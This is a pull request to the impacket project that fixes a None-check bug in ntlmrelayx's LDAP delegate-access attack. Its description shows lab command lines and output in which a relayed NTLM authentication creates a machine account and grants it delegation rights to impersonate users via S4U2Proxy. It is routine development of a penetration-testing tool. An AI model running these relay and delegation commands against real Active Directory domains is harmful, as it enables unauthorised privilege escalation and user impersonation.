### PR TITLE
Fix addComputer when using the delegate access flag

### DIFF
--- a/impacket/examples/ntlmrelayx/attacks/ldapattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/ldapattack.py
@@ -93,7 +93,7 @@ class LDAPAttack(ProtocolAttack):
         domain = re.sub(',DC=', '.', domaindn[domaindn.find('DC='):], flags=re.I)[3:]
 
         computerName = self.computerName
-        if computerName == '':
+        if not computerName:
             # Random computername
             newComputer = (''.join(random.choice(string.ascii_letters) for _ in range(8)) + '$').upper()
         else:


### PR DESCRIPTION
The check on [line 96](https://github.com/SecureAuthCorp/impacket/blob/8d4c91481b01dae9f62804893fcc74a40ffc7c45/impacket/examples/ntlmrelayx/attacks/ldapattack.py#L96) fails due the var having the value `None` instead of being Null/empty.

```bash
justin-p@ctf-machine:~$ sudo ntlmrelayx.py -6 -t ldaps://10.11.12.1 -wh wdap.lab.justin-p.me --delegate-access

...

[*] Authenticating against ldaps://10.11.12.1 as LAB\LAB-PC01$ SUCCEED                                                                                                                   
[*] Enumerating relayed user's privileges. This may take a while on large domains                                                                                                        
Exception in thread Thread-142:                                                                                                                                                          
Traceback (most recent call last):                                                                                                                                                       
  File "/usr/lib/python3.7/threading.py", line 926, in _bootstrap_inner                                                                                                                  
    self.run()                                                                                                                                                                           
  File "/usr/local/lib/python3.7/dist-packages/impacket-0.9.21.dev1+20200209.151450.b938f422-py3.7.egg/impacket/examples/ntlmrelayx/attacks/ldapattack.py", line 597, in run             
    self.delegateAttack(self.config.escalateuser, self.username, domainDumper, self.config.sid)                                                                                          
  File "/usr/local/lib/python3.7/dist-packages/impacket-0.9.21.dev1+20200209.151450.b938f422-py3.7.egg/impacket/examples/ntlmrelayx/attacks/ldapattack.py", line 202, in delegateAttack  
    usersam = self.addComputer('CN=Computers,%s' % domainDumper.root, domainDumper)                                                                                                      
  File "/usr/local/lib/python3.7/dist-packages/impacket-0.9.21.dev1+20200209.151450.b938f422-py3.7.egg/impacket/examples/ntlmrelayx/attacks/ldapattack.py", line 100, in addComputer     
    newComputer = computerName if computerName.endswith('$') else computerName + '$'                                                                                                     
AttributeError: 'NoneType' object has no attribute 'endswith'
```

Some simple debug code

```python
computerName = self.computerName
print(f"current pc name {computerName} !")
if computerName == '':
    print('There should be a print here if the computerName var was empty!')
    # Random computername
    newComputer = (''.join(random.choice(string.ascii_letters) for _ in range(8)) + '$').upper()
else:
    newComputer = computerName if computerName.endswith('$') else computerName + '$'
```

```bash
sudo ntlmrelayx.py -6 -t ldaps://10.11.12.1 -wh wdap.lab.justin-p.me --delegate-access

...

[*] Enumerating relayed user's privileges. This may take a while on large domains
current pc name None !
Exception in thread Thread-9:
Traceback (most recent call last):
  File "/usr/lib/python3.7/threading.py", line 926, in _bootstrap_inner
    self.run()
  File "/usr/local/lib/python3.7/dist-packages/impacket-0.9.21.dev1+20200209.151450.b938f422-py3.7.egg/impacket/examples/ntlmrelayx/attacks/ldapattack.py", line 599, in run
    self.delegateAttack(self.config.escalateuser, self.username, domainDumper, self.config.sid)
  File "/usr/local/lib/python3.7/dist-packages/impacket-0.9.21.dev1+20200209.151450.b938f422-py3.7.egg/impacket/examples/ntlmrelayx/attacks/ldapattack.py", line 204, in delegateAttack  
    usersam = self.addComputer('CN=Computers,%s' % domainDumper.root, domainDumper)
  File "/usr/local/lib/python3.7/dist-packages/impacket-0.9.21.dev1+20200209.151450.b938f422-py3.7.egg/impacket/examples/ntlmrelayx/attacks/ldapattack.py", line 102, in addComputer
    newComputer = computerName if computerName.endswith('$') else computerName + '$'
AttributeError: 'NoneType' object has no attribute 'endswith'
```


Fixed by updating the if-statement to `if not computerName:`

```bash
justin-p@ctf-machine:~$ sudo ntlmrelayx.py -6 -t ldaps://10.11.12.1 -wh wdap.lab.justin-p.me --delegate-access

...

[*] Authenticating against ldaps://10.11.12.1 as LAB\LAB-PC01$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] Attempting to create computer in: CN=Computers,DC=lab,DC=justin-p,DC=me
[*] Adding new computer with username: CRDJMLDT$ and password: 6t1qako_Qo7|NKf result: OK
[*] Delegation rights modified succesfully!
[*] CRDJMLDT$ can now impersonate users on LAB-PC01$ via S4U2Proxy
```

```bash
justin-p@ctf-machine:~$ sudo ntlmrelayx.py -6 -t ldaps://10.11.12.1 -wh wdap.lab.justin-p.me --delegate-access --add-computer test-machine   

...

[*] Authenticating against ldaps://10.11.12.1 as LAB\LAB-PC01$ SUCCEED                                                                                                                   
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] Attempting to create computer in: CN=Computers,DC=lab,DC=justin-p,DC=me
[*] Adding new computer with username: test-machine$ and password: 1VL+fNGuoYsVjud result: OK
[*] Delegation rights modified succesfully!
[*] test-machine$ can now impersonate users on LAB-PC01$ via S4U2Proxy
```

```bash
justin-p@ctf-machine:~$ sudo ntlmrelayx.py -6 -t ldaps://10.11.12.1 -wh wdap.lab.justin-p.me --add-computer

...

[*] Authenticating against ldaps://10.11.12.1 as LAB\LAB-PC01$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains                                                                                                        
[*] Attempting to create computer in: CN=Computers,DC=lab,DC=justin-p,DC=me
[*] Adding new computer with username: QJXQEDAG$ and password: cbhGV)cN$@V)FAP result: OK
[*] Delegation rights modified succesfully!
[*] QJXQEDAG$ can now impersonate users on LAB-PC01$ via S4U2Proxy
```